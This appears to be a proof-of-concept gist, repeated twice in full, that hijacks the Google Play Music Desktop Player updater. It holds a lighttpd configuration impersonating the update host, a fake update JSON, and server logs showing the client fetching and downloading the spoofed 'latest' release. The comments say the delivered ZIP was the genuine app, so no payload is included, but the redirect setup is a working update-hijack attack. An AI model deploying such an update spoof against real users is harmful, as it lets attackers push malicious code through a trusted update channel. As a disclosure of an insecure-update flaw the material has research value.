chtzvt/GPMDP Update Spoof

## GPMDP Update Spoof
$HTTP["host"] =~ "update.googleplaymusicdesktopplayer.com" {

  server.document-root = "/var/www/hosts/gpmdp/"

  $HTTP["url"] =~ "^/update/osx/"{
          server.document-root = "/var/www/hosts/gpmdp/fake.json"
  }

  $HTTP["url"] == "/"{

          url.redirect-code = 302
          url.redirect = (
                                "" => "https://github.com/MarshallOfSound/Google-Play-Music-Desktop-Player-UNOFFICIAL-/releases/download/3.0.1/Google.Play.Music.Desktop.Player.x86.exe"
          )
  }

  $HTTP["url"] =~ "^/download/version/"{

          url.redirect-code = 302
          url.redirect = (
                                "" => "http://update.googleplaymusicdesktopplayer.com/download/Google.Play.Music.Desktop.Player.OSX.zip"
          )
  }
}

# Client behavior when connecting to malicious update server (from lighttpd log):
# Poll root directory of update server (we serve a 302 to windows .exe to imitate the real server)
#  192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET / HTTP/1.1" 302 0 "-" "-"
# GPMDP loads JSON file from fake update server
#  192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET /update/osx/3.0.1 HTTP/1.1" 200 247 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)"
# GPMDP parses our fake update file and follows our "evil" link :^)
#  192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET /download/version/3.0.7/osx_64?filetype=zip HTTP/1.1" 302 0 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)"
# GPMDP downloads the "latest" fake version from our update server!
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:36 -0400] "GET /download/Google.Play.Music.Desktop.Player.OSX.zip HTTP/1.1" 200 50647108 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)"

# Contents of fake.json:
# {
#   "url":"http://update.googleplaymusicdesktopplayer.com/download/version/3.0.7/osx_64?filetype=zip",
#   "name":"3.0.7",
#   "notes":"This is a fake release of GPMDP that contains malicious content!",
#   "pub_date":"2016-03-12T02:53:45.000Z"
# }

# Update file ZIP was just the latest version of GPMDP.
	$HTTP["host"] =~ "update.googleplaymusicdesktopplayer.com" {

	server.document-root = "/var/www/hosts/gpmdp/"

	$HTTP["url"] =~ "^/update/osx/"{
	server.document-root = "/var/www/hosts/gpmdp/fake.json"
	}

	$HTTP["url"] == "/"{

	url.redirect-code = 302
	url.redirect = (
	"" => "https://github.com/MarshallOfSound/Google-Play-Music-Desktop-Player-UNOFFICIAL-/releases/download/3.0.1/Google.Play.Music.Desktop.Player.x86.exe"
	)
	}

	$HTTP["url"] =~ "^/download/version/"{

	url.redirect-code = 302
	url.redirect = (
	"" => "http://update.googleplaymusicdesktopplayer.com/download/Google.Play.Music.Desktop.Player.OSX.zip"
	)
	}
	}

	# Client behavior when connecting to malicious update server (from lighttpd log):
	# Poll root directory of update server (we serve a 302 to windows .exe to imitate the real server)
	# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET / HTTP/1.1" 302 0 "-" "-"
	# GPMDP loads JSON file from fake update server
	# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET /update/osx/3.0.1 HTTP/1.1" 200 247 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)"
	# GPMDP parses our fake update file and follows our "evil" link :^)
	# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET /download/version/3.0.7/osx_64?filetype=zip HTTP/1.1" 302 0 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)"
	# GPMDP downloads the "latest" fake version from our update server!
	# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:36 -0400] "GET /download/Google.Play.Music.Desktop.Player.OSX.zip HTTP/1.1" 200 50647108 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)"

	# Contents of fake.json:
	# {
	# "url":"http://update.googleplaymusicdesktopplayer.com/download/version/3.0.7/osx_64?filetype=zip",
	# "name":"3.0.7",
	# "notes":"This is a fake release of GPMDP that contains malicious content!",
	# "pub_date":"2016-03-12T02:53:45.000Z"
	# }

	# Update file ZIP was just the latest version of GPMDP.